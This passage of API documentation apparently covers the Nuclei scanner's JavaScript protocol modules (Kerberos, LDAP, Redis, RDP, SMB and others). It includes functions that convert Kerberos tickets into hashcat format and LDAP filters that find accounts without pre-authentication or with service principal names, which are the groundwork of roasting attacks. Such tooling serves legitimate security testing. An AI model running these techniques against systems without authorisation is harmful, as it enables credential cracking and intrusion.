itemType can be any one of \['file','dir',”]
#### Parameters
| Name | Type |
| :--------- | :------- |
| `path` | `string` |
| `itemType` | `string` |
#### Returns
`string`\[] | `null`
**`Example`**
```javascript
const fs = require('nuclei/fs');
// this will only return files in /tmp directory
const files = fs.ListDir('/tmp', 'file');
```
**`Example`**
```javascript
const fs = require('nuclei/fs');
// this will only return directories in /tmp directory
const dirs = fs.ListDir('/tmp', 'dir');
```
**`Example`**
```javascript
const fs = require('nuclei/fs');
// when no itemType is provided, it will return both files and directories
const items = fs.ListDir('/tmp');
```
#### Defined in
fs.ts:26
***
### ReadFile
▸ **ReadFile**(`path`): `Uint8Array` | `null`
ReadFile reads file contents within permitted paths
and returns content as byte array
#### Parameters
| Name | Type |
| :----- | :------- |
| `path` | `string` |
#### Returns
`Uint8Array` | `null`
**`Example`**
```javascript
const fs = require('nuclei/fs');
// here permitted directories are $HOME/nuclei-templates/*
const content = fs.ReadFile('helpers/usernames.txt');
```
#### Defined in
fs.ts:42
***
### ReadFileAsString
▸ **ReadFileAsString**(`path`): `string` | `null`
ReadFileAsString reads file contents within permitted paths
and returns content as string
#### Parameters
| Name | Type |
| :----- | :------- |
| `path` | `string` |
#### Returns
`string` | `null`
**`Example`**
```javascript
const fs = require('nuclei/fs');
// here permitted directories are $HOME/nuclei-templates/*
const content = fs.ReadFileAsString('helpers/usernames.txt');
```
#### Defined in
fs.ts:58
***
### ReadFilesFromDir
▸ **ReadFilesFromDir**(`dir`): `string`\[] | `null`
ReadFilesFromDir reads all files from a directory
and returns a string array with file contents of all files
#### Parameters
| Name | Type |
| :---- | :------- |
| `dir` | `string` |
#### Returns
`string`\[] | `null`
**`Example`**
```javascript
const fs = require('nuclei/fs');
// here permitted directories are $HOME/nuclei-templates/*
const contents = fs.ReadFilesFromDir('helpers/ssh-keys');
log(contents);
```
#### Defined in
fs.ts:75
# null
# Namespace: ikev2
## Table of contents
### Classes
* [IKEMessage](/templates/protocols/javascript/modules/ikev2.IKEMessage)
### Interfaces
* [IKENonce](/templates/protocols/javascript/modules/ikev2.IKENonce)
* [IKENotification](/templates/protocols/javascript/modules/ikev2.IKENotification)
### Variables
* [IKE\_EXCHANGE\_AUTH](/templates/protocols/javascript/modules/ikev2#ike_exchange_auth)
* [IKE\_EXCHANGE\_CREATE\_CHILD\_SA](/templates/protocols/javascript/modules/ikev2#ike_exchange_create_child_sa)
* [IKE\_EXCHANGE\_INFORMATIONAL](/templates/protocols/javascript/modules/ikev2#ike_exchange_informational)
* [IKE\_EXCHANGE\_SA\_INIT](/templates/protocols/javascript/modules/ikev2#ike_exchange_sa_init)
* [IKE\_FLAGS\_InitiatorBitCheck](/templates/protocols/javascript/modules/ikev2#ike_flags_initiatorbitcheck)
* [IKE\_NOTIFY\_NO\_PROPOSAL\_CHOSEN](/templates/protocols/javascript/modules/ikev2#ike_notify_no_proposal_chosen)
* [IKE\_NOTIFY\_USE\_TRANSPORT\_MODE](/templates/protocols/javascript/modules/ikev2#ike_notify_use_transport_mode)
* [IKE\_VERSION\_2](/templates/protocols/javascript/modules/ikev2#ike_version_2)
## Variables
### IKE\_EXCHANGE\_AUTH
• `Const` **IKE\_EXCHANGE\_AUTH**: `35`
#### Defined in
ikev2.ts:4
***
### IKE\_EXCHANGE\_CREATE\_CHILD\_SA
• `Const` **IKE\_EXCHANGE\_CREATE\_CHILD\_SA**: `36`
#### Defined in
ikev2.ts:7
***
### IKE\_EXCHANGE\_INFORMATIONAL
• `Const` **IKE\_EXCHANGE\_INFORMATIONAL**: `37`
#### Defined in
ikev2.ts:10
***
### IKE\_EXCHANGE\_SA\_INIT
• `Const` **IKE\_EXCHANGE\_SA\_INIT**: `34`
#### Defined in
ikev2.ts:13
***
### IKE\_FLAGS\_InitiatorBitCheck
• `Const` **IKE\_FLAGS\_InitiatorBitCheck**: `8`
#### Defined in
ikev2.ts:16
***
### IKE\_NOTIFY\_NO\_PROPOSAL\_CHOSEN
• `Const` **IKE\_NOTIFY\_NO\_PROPOSAL\_CHOSEN**: `14`
#### Defined in
ikev2.ts:19
***
### IKE\_NOTIFY\_USE\_TRANSPORT\_MODE
• `Const` **IKE\_NOTIFY\_USE\_TRANSPORT\_MODE**: `16391`
#### Defined in
ikev2.ts:22
***
### IKE\_VERSION\_2
• `Const` **IKE\_VERSION\_2**: `32`
#### Defined in
ikev2.ts:25
# null
# Namespace: kerberos
## Table of contents
### Classes
* [Client](/templates/protocols/javascript/modules/kerberos.Client)
* [Config](/templates/protocols/javascript/modules/kerberos.Config)
### Interfaces
* [AuthorizationDataEntry](/templates/protocols/javascript/modules/kerberos.AuthorizationDataEntry)
* [BitString](/templates/protocols/javascript/modules/kerberos.BitString)
* [EncTicketPart](/templates/protocols/javascript/modules/kerberos.EncTicketPart)
* [EncryptedData](/templates/protocols/javascript/modules/kerberos.EncryptedData)
* [EncryptionKey](/templates/protocols/javascript/modules/kerberos.EncryptionKey)
* [EnumerateUserResponse](/templates/protocols/javascript/modules/kerberos.EnumerateUserResponse)
* [HostAddress](/templates/protocols/javascript/modules/kerberos.HostAddress)
* [LibDefaults](/templates/protocols/javascript/modules/kerberos.LibDefaults)
* [PrincipalName](/templates/protocols/javascript/modules/kerberos.PrincipalName)
* [Realm](/templates/protocols/javascript/modules/kerberos.Realm)
* [TGS](/templates/protocols/javascript/modules/kerberos.TGS)
* [Ticket](/templates/protocols/javascript/modules/kerberos.Ticket)
* [TransitedEncoding](/templates/protocols/javascript/modules/kerberos.TransitedEncoding)
### Functions
* [ASRepToHashcat](/templates/protocols/javascript/modules/kerberos#asreptohashcat)
* [CheckKrbError](/templates/protocols/javascript/modules/kerberos#checkkrberror)
* [NewKerberosClientFromString](/templates/protocols/javascript/modules/kerberos#newkerberosclientfromstring)
* [SendToKDC](/templates/protocols/javascript/modules/kerberos#sendtokdc)
* [TGStoHashcat](/templates/protocols/javascript/modules/kerberos#tgstohashcat)
## Functions
### ASRepToHashcat
▸ **ASRepToHashcat**(`asrep`): `string` | `null`
ASRepToHashcat converts an AS-REP message to a hashcat format
#### Parameters
| Name | Type |
| :------ | :---- |
| `asrep` | `any` |
#### Returns
`string` | `null`
#### Defined in
kerberos.ts:6
***
### CheckKrbError
▸ **CheckKrbError**(`b`): `Uint8Array` | `null`
CheckKrbError checks if the response bytes from the KDC are a KRBError.
#### Parameters
| Name | Type |
| :--- | :----------- |
| `b` | `Uint8Array` |
#### Returns
`Uint8Array` | `null`
#### Defined in
kerberos.ts:15
***
### NewKerberosClientFromString
▸ **NewKerberosClientFromString**(`cfg`): [`Client`](/templates/protocols/javascript/modules/kerberos.Client) | `null`
NewKerberosClientFromString creates a new kerberos client from a string
by parsing krb5.conf
#### Parameters
| Name | Type |
| :---- | :------- |
| `cfg` | `string` |
#### Returns
[`Client`](/templates/protocols/javascript/modules/kerberos.Client) | `null`
**`Example`**
```javascript
const kerberos = require('nuclei/kerberos');
const client = kerberos.NewKerberosClientFromString(`
[libdefaults]
default_realm = ACME.COM
dns_lookup_kdc = true
`);
```
#### Defined in
kerberos.ts:34
***
### SendToKDC
▸ **SendToKDC**(`kclient`, `msg`): `string` | `null`
sendtokdc.go deals with actual sending and receiving responses from KDC
SendToKDC sends a message to the KDC and returns the response.
It first tries to send the message over TCP, and if that fails, it falls back to UDP.(and vice versa)
#### Parameters
| Name | Type |
| :-------- | :------------------------------------------------------------------ |
| `kclient` | [`Client`](/templates/protocols/javascript/modules/kerberos.Client) |
| `msg` | `string` |
#### Returns
`string` | `null`
**`Example`**
```javascript
const kerberos = require('nuclei/kerberos');
const client = new kerberos.Client('acme.com');
const response = kerberos.SendToKDC(client, 'message');
```
#### Defined in
kerberos.ts:51
***
### TGStoHashcat
▸ **TGStoHashcat**(`tgs`, `username`): `string` | `null`
TGStoHashcat converts a TGS to a hashcat format.
#### Parameters
| Name | Type |
| :--------- | :------- |
| `tgs` | `any` |
| `username` | `string` |
#### Returns
`string` | `null`
#### Defined in
kerberos.ts:60
# null
# Namespace: ldap
## Table of contents
### Classes
* [Client](/templates/protocols/javascript/modules/ldap.Client)
### Interfaces
* [Config](/templates/protocols/javascript/modules/ldap.Config)
* [LdapAttributes](/templates/protocols/javascript/modules/ldap.LdapAttributes)
* [LdapEntry](/templates/protocols/javascript/modules/ldap.LdapEntry)
* [Metadata](/templates/protocols/javascript/modules/ldap.Metadata)
* [SearchResult](/templates/protocols/javascript/modules/ldap.SearchResult)
### Variables
* [FilterAccountDisabled](/templates/protocols/javascript/modules/ldap#filteraccountdisabled)
* [FilterAccountEnabled](/templates/protocols/javascript/modules/ldap#filteraccountenabled)
* [FilterCanSendEncryptedPassword](/templates/protocols/javascript/modules/ldap#filtercansendencryptedpassword)
* [FilterDontExpirePassword](/templates/protocols/javascript/modules/ldap#filterdontexpirepassword)
* [FilterDontRequirePreauth](/templates/protocols/javascript/modules/ldap#filterdontrequirepreauth)
* [FilterHasServicePrincipalName](/templates/protocols/javascript/modules/ldap#filterhasserviceprincipalname)
* [FilterHomedirRequired](/templates/protocols/javascript/modules/ldap#filterhomedirrequired)
* [FilterInterdomainTrustAccount](/templates/protocols/javascript/modules/ldap#filterinterdomaintrustaccount)
* [FilterIsAdmin](/templates/protocols/javascript/modules/ldap#filterisadmin)
* [FilterIsComputer](/templates/protocols/javascript/modules/ldap#filteriscomputer)
* [FilterIsDuplicateAccount](/templates/protocols/javascript/modules/ldap#filterisduplicateaccount)
* [FilterIsGroup](/templates/protocols/javascript/modules/ldap#filterisgroup)
* [FilterIsNormalAccount](/templates/protocols/javascript/modules/ldap#filterisnormalaccount)
* [FilterIsPerson](/templates/protocols/javascript/modules/ldap#filterisperson)
* [FilterLockout](/templates/protocols/javascript/modules/ldap#filterlockout)
* [FilterLogonScript](/templates/protocols/javascript/modules/ldap#filterlogonscript)
* [FilterMnsLogonAccount](/templates/protocols/javascript/modules/ldap#filtermnslogonaccount)
* [FilterNotDelegated](/templates/protocols/javascript/modules/ldap#filternotdelegated)
* [FilterPartialSecretsAccount](/templates/protocols/javascript/modules/ldap#filterpartialsecretsaccount)
* [FilterPasswordCantChange](/templates/protocols/javascript/modules/ldap#filterpasswordcantchange)
* [FilterPasswordExpired](/templates/protocols/javascript/modules/ldap#filterpasswordexpired)
* [FilterPasswordNotRequired](/templates/protocols/javascript/modules/ldap#filterpasswordnotrequired)
* [FilterServerTrustAccount](/templates/protocols/javascript/modules/ldap#filterservertrustaccount)
* [FilterSmartCardRequired](/templates/protocols/javascript/modules/ldap#filtersmartcardrequired)
* [FilterTrustedForDelegation](/templates/protocols/javascript/modules/ldap#filtertrustedfordelegation)
* [FilterTrustedToAuthForDelegation](/templates/protocols/javascript/modules/ldap#filtertrustedtoauthfordelegation)
* [FilterUseDesKeyOnly](/templates/protocols/javascript/modules/ldap#filterusedeskeyonly)
* [FilterWorkstationTrustAccount](/templates/protocols/javascript/modules/ldap#filterworkstationtrustaccount)
### Functions
* [DecodeADTimestamp](/templates/protocols/javascript/modules/ldap#decodeadtimestamp)
* [DecodeSID](/templates/protocols/javascript/modules/ldap#decodesid)
* [DecodeZuluTimestamp](/templates/protocols/javascript/modules/ldap#decodezulutimestamp)
* [JoinFilters](/templates/protocols/javascript/modules/ldap#joinfilters)
* [NegativeFilter](/templates/protocols/javascript/modules/ldap#negativefilter)
## Variables
### FilterAccountDisabled
• `Const` **FilterAccountDisabled**: `"(userAccountControl:1.2.840.113556.1.4.803:=2)"`
The user account is disabled.
#### Defined in
ldap.ts:4
***
### FilterAccountEnabled
• `Const` **FilterAccountEnabled**: `"(!(userAccountControl:1.2.840.113556.1.4.803:=2))"`
The user account is enabled.
#### Defined in
ldap.ts:7
***
### FilterCanSendEncryptedPassword
• `Const` **FilterCanSendEncryptedPassword**: `"(userAccountControl:1.2.840.113556.1.4.803:=128)"`
The user can send an encrypted password.
#### Defined in
ldap.ts:10
***
### FilterDontExpirePassword
• `Const` **FilterDontExpirePassword**: `"(userAccountControl:1.2.840.113556.1.4.803:=65536)"`
Represents the password, which should never expire on the account.
#### Defined in
ldap.ts:13
***
### FilterDontRequirePreauth
• `Const` **FilterDontRequirePreauth**: `"(userAccountControl:1.2.840.113556.1.4.803:=4194304)"`
This account doesn't require Kerberos pre-authentication for logging on.
#### Defined in
ldap.ts:16
***
### FilterHasServicePrincipalName
• `Const` **FilterHasServicePrincipalName**: `"(servicePrincipalName=*)"`
The object has a service principal name.
#### Defined in
ldap.ts:19
***
### FilterHomedirRequired
• `Const` **FilterHomedirRequired**: `"(userAccountControl:1.2.840.113556.1.4.803:=8)"`
The home folder is required.
#### Defined in
ldap.ts:22
***
### FilterInterdomainTrustAccount
• `Const` **FilterInterdomainTrustAccount**: `"(userAccountControl:1.2.840.113556.1.4.803:=2048)"`
It's a permit to trust an account for a system domain that trusts other domains.
#### Defined in
ldap.ts:25
***
### FilterIsAdmin
• `Const` **FilterIsAdmin**: `"(adminCount=1)"`
The object is an admin.
#### Defined in
ldap.ts:28
***
### FilterIsComputer
• `Const` **FilterIsComputer**: `"(objectCategory=computer)"`
The object is a computer.
#### Defined in
ldap.ts:31
***
### FilterIsDuplicateAccount
• `Const` **FilterIsDuplicateAccount**: `"(userAccountControl:1.2.840.113556.1.4.803:=256)"`
It's an account for users whose primary account is in another domain.
#### Defined in
ldap.ts:34
***
### FilterIsGroup
• `Const` **FilterIsGroup**: `"(objectCategory=group)"`
The object is a group.
#### Defined in
ldap.ts:37
***
### FilterIsNormalAccount
• `Const` **FilterIsNormalAccount**: `"(userAccountControl:1.2.840.113556.1.4.803:=512)"`
It's a default account type that represents a typical user.
#### Defined in
ldap.ts:40
***
### FilterIsPerson
• `Const` **FilterIsPerson**: `"(objectCategory=person)"`
The object is a person.
#### Defined in
ldap.ts:43
***
### FilterLockout
• `Const` **FilterLockout**: `"(userAccountControl:1.2.840.113556.1.4.803:=16)"`
The user is locked out.
#### Defined in
ldap.ts:46
***
### FilterLogonScript
• `Const` **FilterLogonScript**: `"(userAccountControl:1.2.840.113556.1.4.803:=1)"`
The logon script will be run.
#### Defined in
ldap.ts:49
***
### FilterMnsLogonAccount
• `Const` **FilterMnsLogonAccount**: `"(userAccountControl:1.2.840.113556.1.4.803:=131072)"`
It's an MNS logon account.
#### Defined in
ldap.ts:52
***
### FilterNotDelegated
• `Const` **FilterNotDelegated**: `"(userAccountControl:1.2.840.113556.1.4.803:=1048576)"`
When this flag is set, the security context of the user isn't delegated to a service even if the service account is set as trusted for Kerberos delegation.
#### Defined in
ldap.ts:55
***
### FilterPartialSecretsAccount
• `Const` **FilterPartialSecretsAccount**: `"(userAccountControl:1.2.840.113556.1.4.803:=67108864)"`
The account is a read-only domain controller (RODC).
#### Defined in
ldap.ts:58
***
### FilterPasswordCantChange
• `Const` **FilterPasswordCantChange**: `"(userAccountControl:1.2.840.113556.1.4.803:=64)"`
The user can't change the password.
#### Defined in
ldap.ts:61
***
### FilterPasswordExpired
• `Const` **FilterPasswordExpired**: `"(userAccountControl:1.2.840.113556.1.4.803:=8388608)"`
The user's password has expired.
#### Defined in
ldap.ts:64
***
### FilterPasswordNotRequired
• `Const` **FilterPasswordNotRequired**: `"(userAccountControl:1.2.840.113556.1.4.803:=32)"`
No password is required.
#### Defined in
ldap.ts:67
***
### FilterServerTrustAccount
• `Const` **FilterServerTrustAccount**: `"(userAccountControl:1.2.840.113556.1.4.803:=8192)"`
It's a computer account for a domain controller that is a member of this domain.
#### Defined in
ldap.ts:70
***
### FilterSmartCardRequired
• `Const` **FilterSmartCardRequired**: `"(userAccountControl:1.2.840.113556.1.4.803:=262144)"`
When this flag is set, it forces the user to log on by using a smart card.
#### Defined in
ldap.ts:73
***
### FilterTrustedForDelegation
• `Const` **FilterTrustedForDelegation**: `"(userAccountControl:1.2.840.113556.1.4.803:=524288)"`
When this flag is set, the service account (the user or computer account) under which a service runs is trusted for Kerberos delegation.
#### Defined in
ldap.ts:76
***
### FilterTrustedToAuthForDelegation
• `Const` **FilterTrustedToAuthForDelegation**: `"(userAccountControl:1.2.840.113556.1.4.803:=16777216)"`
The account is enabled for delegation.
#### Defined in
ldap.ts:79
***
### FilterUseDesKeyOnly
• `Const` **FilterUseDesKeyOnly**: `"(userAccountControl:1.2.840.113556.1.4.803:=2097152)"`
Restrict this principal to use only Data Encryption Standard (DES) encryption types for keys.
#### Defined in
ldap.ts:82
***
### FilterWorkstationTrustAccount
• `Const` **FilterWorkstationTrustAccount**: `"(userAccountControl:1.2.840.113556.1.4.803:=4096)"`
It's a computer account for a computer that is running old Windows builds.
#### Defined in
ldap.ts:85
## Functions
### DecodeADTimestamp
▸ **DecodeADTimestamp**(`timestamp`): `string`
DecodeADTimestamp decodes an Active Directory timestamp
#### Parameters
| Name | Type |
| :---------- | :------- |
| `timestamp` | `string` |
#### Returns
`string`
**`Example`**
```javascript
const ldap = require('nuclei/ldap');
const timestamp = ldap.DecodeADTimestamp('132036744000000000');
log(timestamp);
```
#### Defined in
ldap.ts:96
***
### DecodeSID
▸ **DecodeSID**(`s`): `string`
DecodeSID decodes a SID string
#### Parameters
| Name | Type |
| :--- | :------- |
| `s` | `string` |
#### Returns
`string`
**`Example`**
```javascript
const ldap = require('nuclei/ldap');
const sid = ldap.DecodeSID('S-1-5-21-3623811015-3361044348-30300820-1013');
log(sid);
```
#### Defined in
ldap.ts:111
***
### DecodeZuluTimestamp
▸ **DecodeZuluTimestamp**(`timestamp`): `string`
DecodeZuluTimestamp decodes a Zulu timestamp
#### Parameters
| Name | Type |
| :---------- | :------- |
| `timestamp` | `string` |
#### Returns
`string`
**`Example`**
```javascript
const ldap = require('nuclei/ldap');
const timestamp = ldap.DecodeZuluTimestamp('2021-08-25T10:00:00Z');
log(timestamp);
```
#### Defined in
ldap.ts:126
***
### JoinFilters
▸ **JoinFilters**(`filters`): `string`
JoinFilters joins multiple filters into a single filter
#### Parameters
| Name | Type |
| :-------- | :---- |
| `filters` | `any` |
#### Returns
`string`
**`Example`**
```javascript
const ldap = require('nuclei/ldap');
const filter = ldap.JoinFilters(ldap.FilterIsPerson, ldap.FilterAccountEnabled);
```
#### Defined in
ldap.ts:140
***
### NegativeFilter
▸ **NegativeFilter**(`filter`): `string`
NegativeFilter returns a negative filter for a given filter
#### Parameters
| Name | Type |
| :------- | :------- |
| `filter` | `string` |
#### Returns
`string`
**`Example`**
```javascript
const ldap = require('nuclei/ldap');
const filter = ldap.NegativeFilter(ldap.FilterIsPerson);
```
#### Defined in
ldap.ts:154
# null
# Namespace: mssql
## Table of contents
### Classes
* [MSSQLClient](/templates/protocols/javascript/modules/mssql.MSSQLClient)
# null
# Namespace: mysql
## Table of contents
### Classes
* [MySQLClient](/templates/protocols/javascript/modules/mysql.MySQLClient)
### Interfaces
* [MySQLInfo](/templates/protocols/javascript/modules/mysql.MySQLInfo)
* [MySQLOptions](/templates/protocols/javascript/modules/mysql.MySQLOptions)
* [SQLResult](/templates/protocols/javascript/modules/mysql.SQLResult)
* [ServiceMySQL](/templates/protocols/javascript/modules/mysql.ServiceMySQL)
### Functions
* [BuildDSN](/templates/protocols/javascript/modules/mysql#builddsn)
## Functions
### BuildDSN
▸ **BuildDSN**(`opts`): `string` | `null`
BuildDSN builds a MySQL data source name (DSN) from the given options.
#### Parameters
| Name | Type |
| :----- | :--------------------------------------------------------------------------- |
| `opts` | [`MySQLOptions`](/templates/protocols/javascript/modules/mysql.MySQLOptions) |
#### Returns
`string` | `null`
**`Example`**
```javascript
const mysql = require('nuclei/mysql');
const options = new mysql.MySQLOptions();
options.Host = 'acme.com';
options.Port = 3306;
const dsn = mysql.BuildDSN(options);
```
#### Defined in
mysql.ts:14
# null
# Namespace: net
## Table of contents
### Classes
* [NetConn](/templates/protocols/javascript/modules/net.NetConn)
### Functions
* [Open](/templates/protocols/javascript/modules/net#open)
* [OpenTLS](/templates/protocols/javascript/modules/net#opentls)
## Functions
### Open
▸ **Open**(`protocol`): [`NetConn`](/templates/protocols/javascript/modules/net.NetConn) | `null`
Open opens a new connection to the address with a timeout.
supported protocols: tcp, udp
#### Parameters
| Name | Type |
| :--------- | :------- |
| `protocol` | `string` |
#### Returns
[`NetConn`](/templates/protocols/javascript/modules/net.NetConn) | `null`
**`Example`**
```javascript
const net = require('nuclei/net');
const conn = net.Open('tcp', 'acme.com:80');
```
#### Defined in
net.ts:12
***
### OpenTLS
▸ **OpenTLS**(`protocol`): [`NetConn`](/templates/protocols/javascript/modules/net.NetConn) | `null`
Open opens a new connection to the address with a timeout.
supported protocols: tcp, udp
#### Parameters
| Name | Type |
| :--------- | :------- |
| `protocol` | `string` |
#### Returns
[`NetConn`](/templates/protocols/javascript/modules/net.NetConn) | `null`
**`Example`**
```javascript
const net = require('nuclei/net');
const conn = net.OpenTLS('tcp', 'acme.com:443');
```
#### Defined in
net.ts:27
# null
# Namespace: oracle
## Table of contents
### Interfaces
* [IsOracleResponse](/templates/protocols/javascript/modules/oracle.IsOracleResponse)
### Functions
* [IsOracle](/templates/protocols/javascript/modules/oracle#isoracle)
## Functions
### IsOracle
▸ **IsOracle**(`host`, `port`): [`IsOracleResponse`](/templates/protocols/javascript/modules/oracle.IsOracleResponse) | `null`
IsOracle checks if a host is running an Oracle server
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
[`IsOracleResponse`](/templates/protocols/javascript/modules/oracle.IsOracleResponse) | `null`
**`Example`**
```javascript
const oracle = require('nuclei/oracle');
const isOracle = oracle.IsOracle('acme.com', 1521);
log(toJSON(isOracle));
```
#### Defined in
oracle.ts:12
# null
# Namespace: pop3
## Table of contents
### Interfaces
* [IsPOP3Response](/templates/protocols/javascript/modules/pop3.IsPOP3Response)
### Functions
* [IsPOP3](/templates/protocols/javascript/modules/pop3#ispop3)
## Functions
### IsPOP3
▸ **IsPOP3**(`host`, `port`): [`IsPOP3Response`](/templates/protocols/javascript/modules/pop3.IsPOP3Response) | `null`
IsPOP3 checks if a host is running a POP3 server.
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
[`IsPOP3Response`](/templates/protocols/javascript/modules/pop3.IsPOP3Response) | `null`
**`Example`**
```javascript
const pop3 = require('nuclei/pop3');
const isPOP3 = pop3.IsPOP3('acme.com', 110);
log(toJSON(isPOP3));
```
#### Defined in
pop3.ts:12
# null
# Namespace: postgres
## Table of contents
### Classes
* [PGClient](/templates/protocols/javascript/modules/postgres.PGClient)
### Interfaces
* [SQLResult](/templates/protocols/javascript/modules/postgres.SQLResult)
# null
# Namespace: rdp
## Table of contents
### Interfaces
* [CheckRDPAuthResponse](/templates/protocols/javascript/modules/rdp.CheckRDPAuthResponse)
* [IsRDPResponse](/templates/protocols/javascript/modules/rdp.IsRDPResponse)
* [ServiceRDP](/templates/protocols/javascript/modules/rdp.ServiceRDP)
### Functions
* [CheckRDPAuth](/templates/protocols/javascript/modules/rdp#checkrdpauth)
* [IsRDP](/templates/protocols/javascript/modules/rdp#isrdp)
## Functions
### CheckRDPAuth
▸ **CheckRDPAuth**(`host`, `port`): [`CheckRDPAuthResponse`](/templates/protocols/javascript/modules/rdp.CheckRDPAuthResponse) | `null`
CheckRDPAuth checks if the given host and port are running rdp server
with authentication and returns their metadata.
If connection is successful, it returns true.
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
[`CheckRDPAuthResponse`](/templates/protocols/javascript/modules/rdp.CheckRDPAuthResponse) | `null`
**`Example`**
```javascript
const rdp = require('nuclei/rdp');
const checkRDPAuth = rdp.CheckRDPAuth('acme.com', 3389);
log(toJSON(checkRDPAuth));
```
#### Defined in
rdp.ts:14
***
### IsRDP
▸ **IsRDP**(`host`, `port`): [`IsRDPResponse`](/templates/protocols/javascript/modules/rdp.IsRDPResponse) | `null`
IsRDP checks if the given host and port are running rdp server.
If connection is successful, it returns true.
If connection is unsuccessful, it returns false and error.
The Name of the OS is also returned if the connection is successful.
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
[`IsRDPResponse`](/templates/protocols/javascript/modules/rdp.IsRDPResponse) | `null`
**`Example`**
```javascript
const rdp = require('nuclei/rdp');
const isRDP = rdp.IsRDP('acme.com', 3389);
log(toJSON(isRDP));
```
#### Defined in
rdp.ts:32
# null
# Namespace: redis
## Table of contents
### Functions
* [Connect](/templates/protocols/javascript/modules/redis#connect)
* [GetServerInfo](/templates/protocols/javascript/modules/redis#getserverinfo)
* [GetServerInfoAuth](/templates/protocols/javascript/modules/redis#getserverinfoauth)
* [IsAuthenticated](/templates/protocols/javascript/modules/redis#isauthenticated)
* [RunLuaScript](/templates/protocols/javascript/modules/redis#runluascript)
## Functions
### Connect
▸ **Connect**(`host`, `port`, `password`): `boolean` | `null`
Connect tries to connect redis server with password
#### Parameters
| Name | Type |
| :--------- | :------- |
| `host` | `string` |
| `port` | `number` |
| `password` | `string` |
#### Returns
`boolean` | `null`
**`Example`**
```javascript
const redis = require('nuclei/redis');
const connected = redis.Connect('acme.com', 6379, 'password');
```
#### Defined in
redis.ts:11
***
### GetServerInfo
▸ **GetServerInfo**(`host`, `port`): `string` | `null`
GetServerInfo returns the server info for a redis server
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
`string` | `null`
**`Example`**
```javascript
const redis = require('nuclei/redis');
const info = redis.GetServerInfo('acme.com', 6379);
```
#### Defined in
redis.ts:25
***
### GetServerInfoAuth
▸ **GetServerInfoAuth**(`host`, `port`, `password`): `string` | `null`
GetServerInfoAuth returns the server info for a redis server
#### Parameters
| Name | Type |
| :--------- | :------- |
| `host` | `string` |
| `port` | `number` |
| `password` | `string` |
#### Returns
`string` | `null`
**`Example`**
```javascript
const redis = require('nuclei/redis');
const info = redis.GetServerInfoAuth('acme.com', 6379, 'password');
```
#### Defined in
redis.ts:39
***
### IsAuthenticated
▸ **IsAuthenticated**(`host`, `port`): `boolean` | `null`
IsAuthenticated checks if the redis server requires authentication
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
`boolean` | `null`
**`Example`**
```javascript
const redis = require('nuclei/redis');
const isAuthenticated = redis.IsAuthenticated('acme.com', 6379);
```
#### Defined in
redis.ts:53
***
### RunLuaScript
▸ **RunLuaScript**(`host`, `port`, `password`, `script`): `any` | `null`
RunLuaScript runs a lua script on the redis server
#### Parameters
| Name | Type |
| :--------- | :------- |
| `host` | `string` |
| `port` | `number` |
| `password` | `string` |
| `script` | `string` |
#### Returns
`any` | `null`
**`Example`**
```javascript
const redis = require('nuclei/redis');
const result = redis.RunLuaScript('acme.com', 6379, 'password', 'return redis.call("get", KEYS[1])');
```
#### Defined in
redis.ts:67
# null
# Namespace: rsync
## Table of contents
### Interfaces
* [IsRsyncResponse](/templates/protocols/javascript/modules/rsync.IsRsyncResponse)
### Functions
* [IsRsync](/templates/protocols/javascript/modules/rsync#isrsync)
## Functions
### IsRsync
▸ **IsRsync**(`host`, `port`): [`IsRsyncResponse`](/templates/protocols/javascript/modules/rsync.IsRsyncResponse) | `null`
IsRsync checks if a host is running a Rsync server.
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
[`IsRsyncResponse`](/templates/protocols/javascript/modules/rsync.IsRsyncResponse) | `null`
**`Example`**
```javascript
const rsync = require('nuclei/rsync');
const isRsync = rsync.IsRsync('acme.com', 873);
log(toJSON(isRsync));
```
#### Defined in
rsync.ts:12
# null
# Namespace: smb
## Table of contents
### Classes
* [SMBClient](/templates/protocols/javascript/modules/smb.SMBClient)
### Interfaces
* [HeaderLog](/templates/protocols/javascript/modules/smb.HeaderLog)
* [NegotiationLog](/templates/protocols/javascript/modules/smb.NegotiationLog)
* [SMBCapabilities](/templates/protocols/javascript/modules/smb.SMBCapabilities)
* [SMBLog](/templates/protocols/javascript/modules/smb.SMBLog)
* [SMBVersions](/templates/protocols/javascript/modules/smb.SMBVersions)
* [ServiceSMB](/templates/protocols/javascript/modules/smb.ServiceSMB)
* [SessionSetupLog](/templates/protocols/javascript/modules/smb.SessionSetupLog)
# null
# Namespace: smtp
## Table of contents
### Classes
* [Client](/templates/protocols/javascript/modules/smtp.Client)
* [SMTPMessage](/templates/protocols/javascript/modules/smtp.SMTPMessage)
### Interfaces
* [SMTPResponse](/templates/protocols/javascript/modules/smtp.SMTPResponse)
# null
# Namespace: ssh
## Table of contents
### Classes
* [SSHClient](/templates/protocols/javascript/modules/ssh.SSHClient)
### Interfaces
* [Algorithms](/templates/protocols/javascript/modules/ssh.Algorithms)
* [DirectionAlgorithms](/templates/protocols/javascript/modules/ssh.DirectionAlgorithms)
* [EndpointId](/templates/protocols/javascript/modules/ssh.EndpointId)
* [HandshakeLog](/templates/protocols/javascript/modules/ssh.HandshakeLog)
* [KexInitMsg](/templates/protocols/javascript/modules/ssh.KexInitMsg)
# null
# Namespace: structs
## Table of contents
### Functions
* [Pack](/templates/protocols/javascript/modules/structs#pack)
* [StructsCalcSize](/templates/protocols/javascript/modules/structs#structscalcsize)
* [Unpack](/templates/protocols/javascript/modules/structs#unpack)
## Functions
### Pack
▸ **Pack**(`formatStr`, `msg`): `Uint8Array` | `null`
StructsPack returns a byte slice containing the values of msg slice packed according to the given format.
The items of msg slice must match the values required by the format exactly.
Ex: structs.pack("H", 0)
#### Parameters
| Name | Type |
| :---------- | :------- |
| `formatStr` | `string` |
| `msg` | `any` |
#### Returns
`Uint8Array` | `null`
**`Example`**
```javascript
const structs = require('nuclei/structs');
const packed = structs.Pack('H', [0]);
```
#### Defined in
structs.ts:13
***
### StructsCalcSize
▸ **StructsCalcSize**(`format`): `number` | `null`
